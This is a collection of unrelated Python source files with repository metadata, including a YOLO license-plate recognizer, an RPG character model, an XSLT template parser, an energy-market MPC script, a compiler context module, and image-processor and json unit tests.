# print("q13: \n", quiz13())
# print("q14: \n", quiz14())
# print("q15: \n", quiz15())
# print("q16: \n", quiz16())
# print("q17: \n", quiz17())
# print("q18: \n", quiz18())
print("q19: \n", quiz1920())
print("Taken total %f seconds" % (time.time() - start_time))
if __name__ == "__main__":
main()
|
[
"snagletsui@gmail.com"
] |
snagletsui@gmail.com
|
8f942e1b9b8645377e4237207d732ab0c7b5d47d
|
63475d9272a8661ebba37ab155f697c1be012486
|
/09_strokovyy_tip_dannyh/9.4_metody_strok._chastj_2/Удаление фрагмента.py
|
29143d0ef264ef0716944451f7eec05b89c45037
|
[] |
no_license
|
honne02/st_python
|
ce50d221c23de0ce77cd4e8f66a251024eb921bf
|
7af308cd0704c1feca942b4c44c437735485be2f
|
refs/heads/master
| 2023-04-11T00:54:07.695133
| 2021-04-26T16:42:24
| 2021-04-26T16:42:24
| 340,674,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
st = input()
first = st.find('h')
last = st.rfind('h')
st = st[:first] + st[(last + 1):]
print(st)
|
[
"nikita2305200413@gmail.com"
] |
nikita2305200413@gmail.com
|
8611bad8dae8a7bc4fc92b9b43a6d229c5332628
|
ebd8c6fd566fdbf4f51855c61b77c6fe475923cb
|
/detect.py
|
62a5361c2a4345b2c69d95837186e07aef9e55e5
|
[
"BSD-3-Clause"
] |
permissive
|
Shradhhaj-AI-World/Car_License_plate_recognition
|
0429a4ccbf6c1806657a303a82c35c406c7bb81c
|
e882d255f10550299d1af6cfea22073d15bef5e8
|
refs/heads/master
| 2023-01-30T20:24:44.468398
| 2020-12-15T19:15:15
| 2020-12-15T19:15:15
| 319,082,076
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,316
|
py
|
import numpy as np
import argparse
import time
import cv2
import os
import json
from PIL import Image
import io
import pytesseract
confthres=0.5
nmsthres=0.1
yolo_path="./"
class License_plate():
def __init__(self,labelsPath,cfgpath,wpath):
self.labelsPath=labelsPath
self.cfgpath=cfgpath
self.wpath=wpath
self.Lables=self.get_labels(self.labelsPath)
self.CFG=self.get_config(self.cfgpath)
self.Weights=self.get_weights(self.wpath)
self.nets=self.load_model(self.CFG,self.Weights)
self.Colors=self.get_colors(self.Lables)
def get_labels(self,labels_path):
lpath=os.path.sep.join([yolo_path, labels_path])
LABELS = open(lpath).read().strip().split("\n")
return LABELS
def get_colors(self,LABELS):
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),dtype="uint8")
return COLORS
def get_weights(self,weights_path):
weightsPath = os.path.sep.join([yolo_path, weights_path])
return weightsPath
def get_config(self,config_path):
configPath = os.path.sep.join([yolo_path, config_path])
return configPath
def load_model(self,configpath,weightspath):
print("[INFO] loading YOLO from disk...")
net = cv2.dnn.readNetFromDarknet(configpath, weightspath)
return net
def get_predection(self,image,net,LABELS,COLORS):
(H, W) = image.shape[:2]
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416),
swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
layerOutputs = net.forward(ln)
print(layerOutputs)
end = time.time()
print("[INFO] YOLO took {:.6f} seconds".format(end - start))
boxes = []
confidences = []
classIDs = []
for output in layerOutputs:
for detection in output:
scores = detection[5:]
classID = np.argmax(scores)
confidence = scores[classID]
if confidence > confthres:
box = detection[0:4] * np.array([W, H, W, H])
(centerX, centerY, width, height) = box.astype("int")
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
classIDs.append(classID)
idxs = cv2.dnn.NMSBoxes(boxes, confidences, confthres,nmsthres)
if len(idxs) > 0:
for i in idxs.flatten():
(x, y) = (boxes[i][0], boxes[i][1])
(w, h) = (boxes[i][2], boxes[i][3])
cv2.rectangle(image, (x, y), (x + w, y + h), [int(c) for c in COLORS[classIDs[i]]], 2)
subImg = image[y : y + h, x : x + w, :]
text = "{}: {:.4f}".format(LABELS[classIDs[i]], confidences[i])
print(boxes)
print(classIDs)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, [int(c) for c in COLORS[classIDs[i]]], 2)
return image,subImg
def main(self,image_path):
image = cv2.imread(image_path)
detected_image,croped_image=self.get_predection(image,self.nets,self.Lables,self.Colors)
pilImage = Image.fromarray(croped_image)
ext = image_path.split('.')[-1]
b = io.BytesIO()
if ext.lower() in ('png'):
save_ext = 'PNG'
elif ext.lower() in ('jpg', 'jpeg'):
save_ext = 'JPEG'
pilImage.save(b, save_ext)
text = pytesseract.image_to_string(pilImage, lang = 'eng')
return detected_image,text
if __name__ == "__main__":
with open('config.json') as data_file:
cred = json.load(data_file)
lp=License_plate(cred['labelsPath'],cred['cfgpath'],cred['wpath'])
path="static/a11.jpg"
image,text=lp.main(path)
print(text)
cv2.imshow("Image", image)
cv2.waitKey()
|
[
"shradhhaj7@gmail.com"
] |
shradhhaj7@gmail.com
|
e36a01c8c6ee3fc7bce36afcf8fb6864c1bf83bb
|
286703e80d78fa768717ca542de7af83d4fa29a1
|
/rules/Character.py
|
d3b4662b4c58aa77119bcfadef742cb997e0cb2c
|
[] |
no_license
|
JazzJack/Pytans
|
7e063549a22e42f5179d32f4bb602eff4f843f2a
|
87800792f6949f7c6993c2b7078ef7835ce87899
|
refs/heads/master
| 2020-04-15T07:39:05.821992
| 2012-02-15T15:08:40
| 2012-02-15T15:08:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,787
|
py
|
#!/usr/bin/python
# -*- coding: utf-8
from __future__ import division, print_function, unicode_literals
import xml.etree.ElementTree as ElementTree
import copy
import rules
from rules import defaultSkillTree
from rules.Announcement import Announcement, Action
import rules.Attributes
from rules.Dicing import roll, getNumberOfSuccesses, isSuccessful
import rules.Race as Race
from rules.Skilltree import recursiveSkillAdd
from rules.Utils import none2Empty
class Character(object):
def __init__(self, name):
self.name = name
self.attributes = rules.Attributes.Attributes()
self.skills = copy.deepcopy(defaultSkillTree)
self.vantages = []
self.WT = 8
self.RS = 0
self.SR = 0
self.exhaustion = 0
self.AP = 0
self.wounds = 0
self.maneuvers = []
self.feats = []
def rollAttribute(self, att, diff, minSuccesses = 0):
r = roll(self.attributes[att])
if minSuccesses :
return isSuccessful(r, diff, minSuccesses)
else :
return getNumberOfSuccesses(r, diff)
def soak(self, damage, sharpness):
"""
Macht den Widerstandswurf für den Charakter und gibt die Anzahl der Wunden zurück.
"""
d = damage
wounds = -1
damage -= self.RS
diff = sharpness - self.SR
while damage > 0 :
wounds += 1
damage -= self.rollAttribute("KO", diff)
wounds = max(0, wounds)
self.wounds += wounds
self.exhaustion += wounds
#print("%s soaked %d against the %d and got %d wounds!"%(self.name, d, sharpness, wounds))
return wounds
def doInitiative(self, diff):
self.AP = self.rollAttribute("IN", diff)
def isAlive(self):
return self.exhaustion < self.attributes["KO"] and self.wounds < 6
def reset(self):
self.wounds = 0
self.exhaustion = 0
self.AP = 0
def getSkillsDict(self):
skillsDict = {}
for s, v in self.skills.items() :
skillsDict[s] = self.getPoolSize(s)
return skillsDict
def getPoolSize(self, skill):
assert skill in self.skills
# todo: "Hart im Nehmen"
return max(1, self.skills[skill].summed() - self.exhaustion)
def rollSkill(self, skill, diff, minSuccesses = 0, att=None) :
assert skill in self.skills
if att is not None and att in self.attributes:
diff = max(1, diff + self.attributes.getModifier(att))
r = roll(self.getPoolSize(skill))
if minSuccesses :
return isSuccessful(r, diff, minSuccesses)
else:
return getNumberOfSuccesses(r, diff)
def attack(self, weapon, maneuver, target, options = None):
"""
Erzeugt ein Ansageobjekt und reduziert die AP
"""
attack = Action(self, maneuver, weapon, options)
assert self.AP >= 0
announcement = Announcement(attack, target)
return announcement
def gainAP(self):
gain = 3 - self.attributes.getModifier("SN")
self.AP = min(self.attributes["GE"], self.AP + gain)
print("Character %s got %d AP (total %d)"%(self.name, gain, self.AP))
def __str__(self):
indent = " "
result = "<Character " + self.name + "\n"
for att, _ in self.attributes:
result += indent + att + " = " + str(self.attributes[att]) + "\n"
result += ">"
return result.encode("utf-8")
def __repr__(self):
return self.__str__()
def setRace(self, race):
self.race = race
self.attributes.addModDict(race.attributeMods)
def addVantage(self, vantage):
self.vantages.append(vantage)
self.attributes.addModDict(vantage.mods)
def getXPCosts(self):
costs = self.race.getXPCosts()
costs += self.attributes.getXPCosts()
costs += self.skills.getTotalCosts()
for v in self.vantages:
costs += v.costs
for m in self.maneuvers:
costs += m.getXPCosts()
for f in self.feats:
costs += f.costs
return costs
def addFeat(self, feat):
self.feats.append(feat)
def readCharacterFromXML(filename):
tree = ElementTree.parse(filename)
xChar = tree.getroot()
# Name
char = Character(xChar.find("Name").text)
# Race
raceName = xChar.find("Rasse").text
char.setRace(Race.getRaceByName(raceName))
# Attributes
for att in xChar.find("Attribute"):
char.attributes[rules.Attributes.mapping[att.tag]] = int(att.get("value"))
# Vantages
for v in none2Empty(xChar.find("Teile")) :
vantageName = v.get("id")
if vantageName in rules.vantages :
char.addVantage(rules.vantages[vantageName])
else :
import warnings
warnings.warn("Unknown Vantage '%s'"%vantageName)
# Feats
for f in none2Empty(xChar.find("Sonderfertigkeiten")) :
featName = f.get("id")
if featName in rules.feats:
char.addFeat(rules.feats[featName])
else :
import warnings
warnings.warn("Unknown Feat '%s' in char %s"%(featName, char.name))
# Skills
recursiveSkillAdd(char.skills, xChar.find("Fertigkeiten"))
# Maneuvers
for xManeuver in none2Empty(xChar.find("ManöverListe")):
maneuverName = xManeuver.get("id")
if maneuverName in rules.maneuvers:
maneuver = rules.maneuvers[maneuverName].copy()
maneuver.level = int(xManeuver.get("stufe"))
char.maneuvers.append(maneuver)
else :
import warnings
warnings.warn("Unknown Maneuver %s in Char %s"%(maneuverName, char.name))
return char
|
[
"klaus.greff@gmx.net"
] |
klaus.greff@gmx.net
|
5ab24c6a8ec0f36df320431b89ea6470b8909a7e
|
f4b5721c6b3f5623e306d0aa9a95ec53461c1f89
|
/backend/src/gloader/xml/xslt/AttributeValueTemplate.py
|
7f4c982f79e53d298825f773d7843f57e306cd56
|
[
"MIT"
] |
permissive
|
citelab/gini5
|
b53e306eb5dabf98e9a7ded3802cf2c646f32914
|
d095076113c1e84c33f52ef46a3df1f8bc8ffa43
|
refs/heads/uml-rename
| 2022-12-10T15:58:49.578271
| 2021-12-09T23:58:01
| 2021-12-09T23:58:01
| 134,980,773
| 12
| 11
|
MIT
| 2022-12-08T05:20:58
| 2018-05-26T17:16:50
|
Python
|
UTF-8
|
Python
| false
| false
| 3,437
|
py
|
########################################################################
#
# File Name: AttributeValueTemplate.py
#
#
"""
Implementation of AVTs from the XSLT Spec.
WWW: http://4suite.com/4XSLT e-mail: support@4suite.com
Copyright (c) 1999-2000 FourThought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
import re, string
from xml.xslt import XsltException, Error
from xml.xpath import XPathParser, Conversions
g_braceSplitPattern = re.compile(r'([\{\}])')
class AttributeValueTemplate:
def __init__(self, source,reparse = 1):
self.source = source
if reparse:
self._plainParts = []
self._parsedParts = []
self._parse()
def _parse(self):
parser = XPathParser.XPathParser()
curr_plain_part = ''
curr_template_part = ''
in_plain_part = 1
split_form = re.split(g_braceSplitPattern, self.source)
skip_flag = 0
for i in range(len(split_form)):
segment = split_form[i]
if skip_flag:
skip_flag = skip_flag - 1
continue
if segment in ['{', '}']:
#Here we are accounting for a possible blank segment in between
try:
next = split_form[i + 1] + split_form[i + 2]
except IndexError:
next = None
if next == segment:
if in_plain_part:
curr_plain_part = curr_plain_part + segment
else:
curr_template_part = curr_template_part + segment
skip_flag = 2
elif segment == '{':
if in_plain_part:
self._plainParts.append(curr_plain_part)
in_plain_part = 0
curr_plain_part = ''
else:
raise XsltException(Error.AVT_SYNTAX)
else:
if not in_plain_part:
parsed = parser.parseExpression(curr_template_part)
self._parsedParts.append(parsed)
in_plain_part = 1
curr_template_part = ''
else:
raise XsltException(Error.AVT_SYNTAX)
else:
if in_plain_part:
curr_plain_part = curr_plain_part + segment
else:
curr_template_part = curr_template_part + segment
if in_plain_part:
self._plainParts.append(curr_plain_part)
else:
raise XsltException(Error.AVT_SYNTAX)
def evaluate(self, context):
result = ''
expansions = map(
lambda x, c=context: Conversions.StringValue(x.evaluate(c)),
self._parsedParts
)
for i in range(len(self._parsedParts)):
result = result + self._plainParts[i] + expansions[i]
result = result + self._plainParts[-1]
return result
def __repr__(self):
return self.source
def __getinitargs__(self):
return (self.source, 0)
def __getstate__(self):
return (self._plainParts,self._parsedParts)
def __setstate__(self, state):
# Nothing to do
self._plainParts,self._parsedParts = state
|
[
"maheswar@MacBook-Pro.local"
] |
maheswar@MacBook-Pro.local
|
f8d4394776a7d44072016fdd75ad9a9b43163c98
|
c5fcb8259f13f2fb79b3ec10edcbe29cffeae61d
|
/algo/test5.py
|
6d05ce4e7453874ea59e6f0d68d72864c71deeb4
|
[] |
no_license
|
verahsu860604/aesda
|
1d66880e93db60149772d6d87801babca17b8720
|
6eebe17ef55d3e35acb4ae761ef4d2340f8212e6
|
refs/heads/master
| 2022-11-18T05:37:25.553413
| 2020-05-21T07:18:37
| 2020-05-21T07:18:37
| 242,245,109
| 1
| 0
| null | 2022-11-10T17:27:36
| 2020-02-21T22:57:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,914
|
py
|
import parameters
import config
import market
import energy_source
import mpc_solver
import matplotlib.pyplot as plt
import json
import numpy as np
from time import sleep
import cyclic_coordinate
import pareto
parameters = {
'energy_sources': [
{
'soc_profile_max_power_downward': 20,
'dod_profile_change_th': 0.2,
'soc_profile_min_output_th': 30,
'cost': 470,
'efficiency_upward': 0.78,
'soc_profile_max_power_upward': 20,
'soc_profile_max_input_th': 70,
'efficiency_downward': 0.78,
'self_discharge_ratio': 0,
'other_cost': 0,
'soc_profile_energy_scale': 8
},
{
'dod_profile_change_th': 0.2,
'efficiency_upward': 0.95,
'efficiency_downward': 0.95,
'c4': 40000,
'c1': 10000000,
'soc_profile_max_power_downward': 10,
'c5': 10000,
'd4': 30,
'self_discharge_ratio': 0,
'd2': 4,
'c6': 3000,
'cost': 310,
'c3': 100000,
'other_cost': 0,
'd6': 100,
'd3': 17,
'd5': 60,
'soc_profile_min_output_th': 0,
'c2': 1000000,
'd1': 2,
'soc_profile_max_power_upward': 10,
'soc_profile_energy_scale': 4,
'soc_profile_max_input_th': 100
}
],
'markets': [
{
"time_window_in_delivery": 4,
# Primary
"planning_phase_length": 60,
"selection_phase_length": 60,
"schedule_phase_length": 60,
"delivery_phase_length": 60,
"price_cyclic_n_upward": 2,
"price_cyclic_n_downward": 2,
"price_cyclic_eps_downward": 80,
"price_cyclic_eps_upward": 16,
"max_feasible_selling_price": 250,
"min_feasible_selling_price": 150,
"min_feasible_buying_price": 1,
"max_feasible_buying_price": 20,
"setpoint_interval": 1,
# "percentage_fixed": True,
'price_data_path': 'data/primary_price.csv',
'setpoint_data_path': 'data/primary_setpoint.csv'
},
{
"time_window_in_delivery": 4, # Secondary
"planning_phase_length": 120,
"selection_phase_length": 120,
"schedule_phase_length": 120,
"delivery_phase_length": 120,
"setpoint_interval": 15,
"price_cyclic_n_upward": 2,
"price_cyclic_n_downward": 2,
"price_cyclic_eps_downward": 80,
"price_cyclic_eps_upward": 16,
"max_feasible_selling_price": 250,
"min_feasible_selling_price": 150,
"min_feasible_buying_price": 1,
"max_feasible_buying_price": 20,
# "percentage_fixed": True,
'price_data_path': 'data/primary_price.csv',
'setpoint_data_path': 'data/primary_setpoint.csv'
},
# {
# "time_window_in_delivery": 4, # Tertiary
# "planning_phase_length": 960,
# "selection_phase_length": 960,
# "schedule_phase_length": 960,
# "delivery_phase_length": 960,
# "setpoint_interval": 60,
# # 'price_data_path': 'data/primary_price.csv',
# # 'setpoint_data_path': 'data/primary_setpoint.csv'
# },
],
'config':{
'planning_horizon': 360,
'soh_update_interval': 1440,
'tot_timestamps': 10080
}
}
def get_parameters():
return parameters
data = get_parameters()
config = config.Config(**data['config'])
energy_sources = [energy_source.EnergySource(**kwargs) for kwargs in data['energy_sources']]
for ess in energy_sources:
ess.tuning_parameter_fit()
markets = [market.Market(**kwargs) for kwargs in data['markets']]
mpc = mpc_solver.MPCSolver(config=config, markets=markets, energy_sources=energy_sources)
# Fake run
cc = cyclic_coordinate.CyclicCoordinate(markets, mpc, [10, 10], really_run=False)
solutions_fake = cc.Algo5()
print("totl: " + str(len(solutions_fake)))
cc = cyclic_coordinate.CyclicCoordinate(markets, mpc, [10, 10])
solutions = cc.Algo5()
print(solutions[0])
# pe = pareto.ParetoEfficient(solutions)
# inefficient_list, efficient_list = pe.pareto_analysis()
# tuple(Revenue, value_i(useless), soc_record, soh for each device, power record, prices, percentages)
# (216.29629629629628, 2, array([[1. , 1. ], [0.95061731, 1. ]]),
# (1.0, 1.0), array([[[ 0., 0.], [24., 0.]],[[ 0., 0.],[ 0., 12.]]]),
# [2.2222222222222223, 18.02469135802469, 2.2222222222222223, 18.02469135802469, 2.2222222222222223, 18.02469135802469],
# (6.666666666666667, 10.0, 'free'))
# assert len(solutions) == 36
|
[
"justryit8@gmail.com"
] |
justryit8@gmail.com
|
669a53c965306f6b2561c3113c8f5d9599eb811b
|
5f1877494c8da736b675b02480e42d79b570bbcc
|
/llpy16/context.py
|
a2bc37b84c453e454cdb04994295762ebad2c278
|
[] |
no_license
|
ojii/llpy16
|
757de9920a7c15e204ffbfc72995e713717e6ca4
|
f9ff6a58ddb46a26b807012ba57d37fef85e51a1
|
refs/heads/master
| 2021-01-16T19:32:40.354429
| 2013-03-19T05:21:12
| 2013-03-19T05:21:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,280
|
py
|
# -*- coding: utf-8 -*-
import ast
from collections import defaultdict
from contextlib import contextmanager
import os
import imp
from llpy16.assembler import hexify
class Function(object):
def __init__(self, name, args, node, deferred=True):
self.name = name
self.args = args
self.node = node
self.deferred = deferred
class Namespace(object):
def __init__(self):
self.constants = {}
self.functions = {}
self.extensions = {}
self.configs = {}
self.data = {}
class Register(object):
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class RegisterOperation(object):
def __init__(self, left, right, operator):
self.left = left
self.right = right
self.operator = operator
def __str__(self):
return '%s %s %s' % (hexify(self.left), self.operator, hexify(self.right))
class Context(object):
_sep = '__'
def __init__(self, paths):
self._paths = paths
self._namespaces = defaultdict(Namespace)
self._current_namespace = ''
self._modules = []
# Public API
def find_import(self, name, assembler):
if name in self._modules:
# already imported
return
bits = name.split('.')
for path in self._paths:
pypath = os.path.join(path, *bits) + '.py'
llpath = os.path.join(path, *bits) + '.llpy16'
found = False
if os.path.exists(pypath):
module = imp.load_source(name, pypath)
with self.namespace(name):
for name in getattr(module, 'LLPY16_EXTS', []):
self.define_extension(name, getattr(module, name))
for name in getattr(module, 'LLPY16_CONST', []):
self.define_constant(name, getattr(module, name))
for name in getattr(module, 'LLPY16_DATA', []):
self.define_constant(name, self.expand_name(getattr(module, name)))
initialize = getattr(module, getattr(module, 'LLPY16_INIT', '-'), None)
if callable(initialize):
initialize(assembler, self)
found = True
if os.path.exists(llpath):
with open(llpath) as fobj:
return fobj.read()
if found:
return
raise ImportError(name)
def define_extension(self, name, handler):
self.current_namespace.extensions[name] = handler
def get_extension(self, name):
return self.current_namespace.extensions[name]
def define_constant(self, name, value):
self.current_namespace.constants[name] = value
def get_constant(self, name):
return self.current_namespace.constants[name]
def define_function(self, name, args, node, deferred=True):
expanded_name = self.expand_name(name)
self.current_namespace.functions[name] = function = Function(expanded_name, args, node, deferred)
return function
def get_function(self, name):
return self.current_namespace.functions[name]
def set_config(self, key, value):
self.current_namespace.configs[key] = value
def get_config(self, key):
return self.current_namespace.configs[key]
def resolve_function(self, node, assembler):
name, namespace = self.resolve_name(node.func)
with self.namespace(namespace):
try:
ext = self.get_extension(name)
except KeyError:
try:
return self.get_function(name)
except KeyError:
raise NameError('%s.%s' % (namespace, name))
args, kwargs = self._call_to_args_kwargs(node)
ext(assembler, self, *args, **kwargs)
def expand_name(self, name):
return self._current_namespace.replace('.', self._sep) + self._sep + name
@contextmanager
def namespace(self, namespace):
old = self._current_namespace
self._current_namespace = namespace
try:
yield
finally:
self._current_namespace = old
# Private API
@property
def current_namespace(self):
return self._namespaces[self._current_namespace]
def resolve_name(self, thing):
if isinstance(thing, ast.Name):
name = thing.id
namespace = self._current_namespace
elif isinstance(thing, ast.Attribute):
bits = []
value = thing
while isinstance(value, ast.Attribute):
bits.append(value.attr)
value = value.value
if not isinstance(value, ast.Name):
raise TypeError()
bits.append(value.id)
bits.reverse()
name = bits.pop()
namespace = '.'.join(bits)
else:
raise TypeError(thing)
return name, namespace
def _call_to_args_kwargs(self, node):
def _get_value(thing):
if isinstance(thing, ast.Str):
return thing.s
elif isinstance(thing, ast.Num):
return thing.n
elif isinstance(thing, ast.Tuple):
return tuple(map(_get_value, thing.elts))
elif isinstance(thing, ast.List):
return list(map(_get_value, thing.elts))
elif isinstance(thing, ast.Dict):
return {_get_value(key): _get_value(value) for key, value in zip(thing.keys, thing.values)}
elif isinstance(thing, ast.BinOp):
left = _get_value(thing.left)
right = _get_value(thing.right)
if isinstance(thing.op, ast.Add):
operator = '+'
elif isinstance(thing.op, ast.Sub):
operator = '-'
else:
raise TypeError(thing.op)
if isinstance(left, int) and isinstance(right, int):
return (left + right) if operator == '+' else (left - right)
elif isinstance(left, (Register, int)) and isinstance(right, (Register, int)):
return RegisterOperation(left, right, operator)
else:
raise TypeError("%r %s %r" % left, operator, right)
else:
name, namespace = self.resolve_name(thing)
if name == name.upper() and len(name) == 1 and namespace == self._current_namespace:
return Register(name)
else:
with self.namespace(namespace):
try:
return self.get_constant(name)
except KeyError:
try:
return self.get_function(name).name
except KeyError:
print self.current_namespace.functions
raise NameError(name)
args = map(_get_value, node.args)
kwargs = {keyword.arg: _get_value(keyword.value) for keyword in node.keywords}
return args, kwargs
|
[
"ojiidotch@gmail.com"
] |
ojiidotch@gmail.com
|
86f816fa4c07689b4bbb27949c7e824974c6af10
|
c46754b9600a12df4f9d7a6320dfc19aa96b1e1d
|
/tests/models/deit/test_image_processing_deit.py
|
21dc3d9e95a79f48a9c4a6af5658a0715ce5faf6
|
[
"Apache-2.0"
] |
permissive
|
huggingface/transformers
|
ccd52a0d7c59e5f13205f32fd96f55743ebc8814
|
4fa0aff21ee083d0197a898cdf17ff476fae2ac3
|
refs/heads/main
| 2023-09-05T19:47:38.981127
| 2023-09-05T19:21:33
| 2023-09-05T19:21:33
| 155,220,641
| 102,193
| 22,284
|
Apache-2.0
| 2023-09-14T20:44:49
| 2018-10-29T13:56:00
|
Python
|
UTF-8
|
Python
| false
| false
| 4,508
|
py
|
# coding=utf-8
# Copyright 2021 HuggingFace Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers.testing_utils import require_torch, require_vision
from transformers.utils import is_vision_available
from ...test_image_processing_common import ImageProcessingTestMixin, prepare_image_inputs
if is_vision_available():
from transformers import DeiTImageProcessor
class DeiTImageProcessingTester(unittest.TestCase):
def __init__(
self,
parent,
batch_size=7,
num_channels=3,
image_size=18,
min_resolution=30,
max_resolution=400,
do_resize=True,
size=None,
do_center_crop=True,
crop_size=None,
do_normalize=True,
image_mean=[0.5, 0.5, 0.5],
image_std=[0.5, 0.5, 0.5],
):
size = size if size is not None else {"height": 20, "width": 20}
crop_size = crop_size if crop_size is not None else {"height": 18, "width": 18}
self.parent = parent
self.batch_size = batch_size
self.num_channels = num_channels
self.image_size = image_size
self.min_resolution = min_resolution
self.max_resolution = max_resolution
self.do_resize = do_resize
self.size = size
self.do_center_crop = do_center_crop
self.crop_size = crop_size
self.do_normalize = do_normalize
self.image_mean = image_mean
self.image_std = image_std
def prepare_image_processor_dict(self):
return {
"do_resize": self.do_resize,
"size": self.size,
"do_center_crop": self.do_center_crop,
"crop_size": self.crop_size,
"do_normalize": self.do_normalize,
"image_mean": self.image_mean,
"image_std": self.image_std,
}
def expected_output_image_shape(self, images):
return self.num_channels, self.crop_size["height"], self.crop_size["width"]
def prepare_image_inputs(self, equal_resolution=False, numpify=False, torchify=False):
return prepare_image_inputs(
batch_size=self.batch_size,
num_channels=self.num_channels,
min_resolution=self.min_resolution,
max_resolution=self.max_resolution,
equal_resolution=equal_resolution,
numpify=numpify,
torchify=torchify,
)
@require_torch
@require_vision
class DeiTImageProcessingTest(ImageProcessingTestMixin, unittest.TestCase):
image_processing_class = DeiTImageProcessor if is_vision_available() else None
test_cast_dtype = True
def setUp(self):
self.image_processor_tester = DeiTImageProcessingTester(self)
@property
def image_processor_dict(self):
return self.image_processor_tester.prepare_image_processor_dict()
def test_image_processor_properties(self):
image_processing = self.image_processing_class(**self.image_processor_dict)
self.assertTrue(hasattr(image_processing, "do_resize"))
self.assertTrue(hasattr(image_processing, "size"))
self.assertTrue(hasattr(image_processing, "do_center_crop"))
self.assertTrue(hasattr(image_processing, "center_crop"))
self.assertTrue(hasattr(image_processing, "do_normalize"))
self.assertTrue(hasattr(image_processing, "image_mean"))
self.assertTrue(hasattr(image_processing, "image_std"))
def test_image_processor_from_dict_with_kwargs(self):
image_processor = self.image_processing_class.from_dict(self.image_processor_dict)
self.assertEqual(image_processor.size, {"height": 20, "width": 20})
self.assertEqual(image_processor.crop_size, {"height": 18, "width": 18})
image_processor = self.image_processing_class.from_dict(self.image_processor_dict, size=42, crop_size=84)
self.assertEqual(image_processor.size, {"height": 42, "width": 42})
self.assertEqual(image_processor.crop_size, {"height": 84, "width": 84})
|
[
"noreply@github.com"
] |
huggingface.noreply@github.com
|
61fdf94b5af1bd51c62587f4ed95e7986d4622cd
|
afca2532d8e6bbc79c4ca0f2044ac17c6be99791
|
/file_system/file_system_helpers.py
|
483897ef83a68fdd5791482d522c9cd5a4307385
|
[] |
no_license
|
matthewcanova/file-system
|
75f589bef05ed1e625a118e236c9c560c971c5eb
|
0e63ea3355fe4cdd9e7f8af3b3408247297282c9
|
refs/heads/master
| 2022-08-16T19:40:04.800642
| 2020-05-26T04:53:04
| 2020-05-26T04:53:04
| 266,873,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 618
|
py
|
def path_parse(path):
"""
Guarantees no leading or trailing \s and no blank entries in the path list
Returns a parsed list of the path entities
"""
split_path = path.split('\\')
split_path = [entity for entity in split_path if entity != '']
return split_path
def print_recursive(entity):
"""
Recursively prints an entity and its children
"""
string = entity.path + ' ' + str(entity.size) + '\n'
if entity.entity_type != 'text':
for entity_name in entity.get_names():
string += print_recursive(entity.get_child(entity_name))
return string
|
[
"matthewcanova@gmail.com"
] |
matthewcanova@gmail.com
|
3ac69e9105cdc2bfb5dd22f1c4bf0bb8a2ca87c4
|
3dc647cd07a7361ed401e40d2b7cce8c826c8f6c
|
/Lib/test/test_json/test_dump.py
|
13b40020781bae33ea47c8ff5446030e7f348677
|
[
"Python-2.0",
"CC-BY-4.0",
"MIT"
] |
permissive
|
RustPython/RustPython
|
5ddce4a9848b9de8c041ffd2634f83c0105d3f39
|
b864e5da1f18897fc884180b7093df5aa170024f
|
refs/heads/main
| 2023-09-04T12:38:29.458699
| 2023-09-03T12:33:42
| 2023-09-03T12:33:42
| 135,201,145
| 15,815
| 1,302
|
MIT
| 2023-09-14T08:11:45
| 2018-05-28T19:27:01
|
Rust
|
UTF-8
|
Python
| false
| false
| 2,409
|
py
|
from io import StringIO
from test.test_json import PyTest, CTest
from test.support import bigmemtest, _1G
class TestDump:
def test_dump(self):
sio = StringIO()
self.json.dump({}, sio)
self.assertEqual(sio.getvalue(), '{}')
def test_dumps(self):
self.assertEqual(self.dumps({}), '{}')
def test_dump_skipkeys(self):
v = {b'invalid_key': False, 'valid_key': True}
with self.assertRaises(TypeError):
self.json.dumps(v)
s = self.json.dumps(v, skipkeys=True)
o = self.json.loads(s)
self.assertIn('valid_key', o)
self.assertNotIn(b'invalid_key', o)
def test_encode_truefalse(self):
self.assertEqual(self.dumps(
{True: False, False: True}, sort_keys=True),
'{"false": true, "true": false}')
self.assertEqual(self.dumps(
{2: 3.0, 4.0: 5, False: 1, 6: True}, sort_keys=True),
'{"false": 1, "2": 3.0, "4.0": 5, "6": true}')
# Issue 16228: Crash on encoding resized list
def test_encode_mutated(self):
a = [object()] * 10
def crasher(obj):
del a[-1]
self.assertEqual(self.dumps(a, default=crasher),
'[null, null, null, null, null]')
# Issue 24094
def test_encode_evil_dict(self):
class D(dict):
def keys(self):
return L
class X:
def __hash__(self):
del L[0]
return 1337
def __lt__(self, o):
return 0
L = [X() for i in range(1122)]
d = D()
d[1337] = "true.dat"
self.assertEqual(self.dumps(d, sort_keys=True), '{"1337": "true.dat"}')
class TestPyDump(TestDump, PyTest): pass
class TestCDump(TestDump, CTest):
# The size requirement here is hopefully over-estimated (actual
# memory consumption depending on implementation details, and also
# system memory management, since this may allocate a lot of
# small objects).
@bigmemtest(size=_1G, memuse=1)
def test_large_list(self, size):
N = int(30 * 1024 * 1024 * (size / _1G))
l = [1] * N
encoded = self.dumps(l)
self.assertEqual(len(encoded), N * 3)
self.assertEqual(encoded[:1], "[")
self.assertEqual(encoded[-2:], "1]")
self.assertEqual(encoded[1:-2], "1, " * (N - 1))
|
[
